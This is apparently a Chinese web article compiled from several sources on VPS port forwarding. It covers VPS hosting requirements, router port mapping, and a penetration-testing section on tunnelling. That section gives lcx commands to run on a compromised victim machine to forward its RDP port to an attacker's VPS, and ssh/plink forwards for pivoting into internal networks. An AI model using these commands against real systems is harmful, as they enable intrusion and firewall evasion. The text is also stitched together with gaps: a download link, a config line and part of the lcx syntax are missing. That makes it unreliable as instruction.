端口转发vps(端口转发有什么用)

目录：

• 1、国外vps里的ip和端口是否能映射到自己的台式电脑做服务器用？
• 2、如何用租到的VPS服务器转发内网的端口数据，实现内网穿透服务？
• 3、
  隧道-传输层隧道技术端口转发
• 4、SSH进行端口转发

国外vps里的ip和端口是否能映射到自己的台式电脑做服务器用？

做VPS需要具备几个条件.

一.要有独立的IP分配.如果你是用共享IP的话.VPS和虚拟主机就没有太多区别了.缺少应有的意义。

二.要有充足的带宽来分配.如果你家用的是2M的普通小区宽带.是不适合来做VPS用的。

三.需要有虚拟主机管理系统.这套系统主要是用来开通和管理VPS的.虽然不是一定要有这个系统才可以开VPS.但有这套系统会让VPS的管理与售后更加完善。

四.除此以外也需要你懂技术.至少常见的一些故障排除要懂。

如果你不具备这些条件的话.建议你找IDC公司开通一个VPS.比你自己开通要划算的多.现在VPS的价格也做的非常低.512M内存配置的不到一千每年.而且售后也是由IDC提供的。

如何用租到的VPS服务器转发内网的端口数据，实现内网穿透服务？

先找到你自己机器的内网地址，打开cmd，输入ipconfig，查看一下IPv4地址就是你的内网IP，再登录路由器找到虚拟服务器，填写你的内网ip地址，内网端口和外网端口根据你的实际需求写，协议类型一般写all就行！

隧道-传输层隧道技术端口转发

在渗透测试中，如果内网的防火墙阻止了对指定端口的访问，在获取了目标机器的权限后，可以使用防火墙命令打开指定的端口或关闭防火墙。如果内网中存在一系列防御系统，TCP、UDP 流量会被大量拦截。

传输层隧道技术主要用到的工具有lcx ,netcat, PowerCat等

lcx是一个很经典的端口转发工具，其基于Socket套接字，有Windows和Linux两个版本。Windows的为lcx.exe，Linux的为portmap。

下载地址：

一个正常的socket套接字必须具备两端：一端是服务器，监听一个端口，等待客户端连接；另一端为客户端，通过给出服务器的IP和端口，与服务端建立连接。

在 受害机 （ Windows）上面执行如下命令，将受害机3389端口的数据转发到攻击者公网VPS（Windows）的8000端口上。

lcx.exe -slave 8000 127.0.0.1 3389

在 攻击机 上面执行如下命令，将本机8000端口上监听到的数据转发到本机的4444端口上面

lcx.exe -listen 8000 4444

有些时候,防火墙会禁用一些端口,我们可以使用

Lcx.exe –tran 5555 3389

SSH进行端口转发

大前提，windows可以使用freesshd做ssh服务器当一级代理，但是它的端口转发功能有bug，所以还是用linux的ssh吧。

ps：Earthworm虽然简单好用，但是传输的流量是不加密的，已经碰到过好几次反弹回来仍然被安全设备拦截的情况，所以还是老老实实用ssh代理了

安装sshpass，需要gcc编译安装。

ssh会话会在空闲一段时间后自动僵死，但是要注意 进程 和 连接 仍在。虽然客户端也可以设置心跳检测，但在服务端设置更方便。

修改/etc/ssh/sshd_config

p参数表示ssh的端口

ssh命令

ssh -fCN -L 127.0.0.1:1234:192.168.99.125:3389 root@192.168.99.199 -p 53

plink.exe命令

plink.exe -v -C -N -L 127.0.0.1:8888:127.0.0.1:3389 test@117.28.112.73 -P 9398 -pw password

直接访问 本机 开启监听的1234端口，其实等于通过 远程主机 192.168.99.199来访问 远程主机 192.168.99.125上的3389端口

-n 将 stdio 重定向到 /dev/null，与 -f 配合使用

-T 不分配 TTY 只做代理用

-q 安静模式，不输出 错误/警告 信息

-f 后台连接

-N 连接后不取得shell

-C 启动压缩，加快速度

（如不理解参数可以去掉他们看效果）

-L 1234为建立隧道后本地监听的端口，192.168.99.125是隧道出口转发到的目标地址（即xp靶机），3389是目标端口，root@192.168.99.199是建立隧道的另一方，即rolling版登录的账号和ip，-p 53是rolling版的监听端口。

ssh -fCN -R 0.0.0.0:9999:192.168.1.1:80 root@test.com

0.0.0.0表示vps上监听所有地址。

直接访问 远程主机 上开启监听的9999端口就相当于通过 本机 来访问192.168.1.1上的80端口。

其中有个 大坑 。

bind_address 参数默认值为空，等价于

并不意味着任何机器，都可以通过 VPS 来访问 内网 机器。建立连接后，只能在 VPS ( sshd server ) 本地 访问 「内网」 机器。要在办公网的笔记本上通过 VPS 映射的端口来访问 内网 机器，需要修改vps上的/etc/ssh/sshd_config文件，启用 VPS sshd 的 GatewayPorts 参数，set to yes or clientspecified ，允许任意请求地址，通过转发的端口访问内网机器。

-D socks代理，不多解释了。

-g 监听所有地址，允许其他主机连接。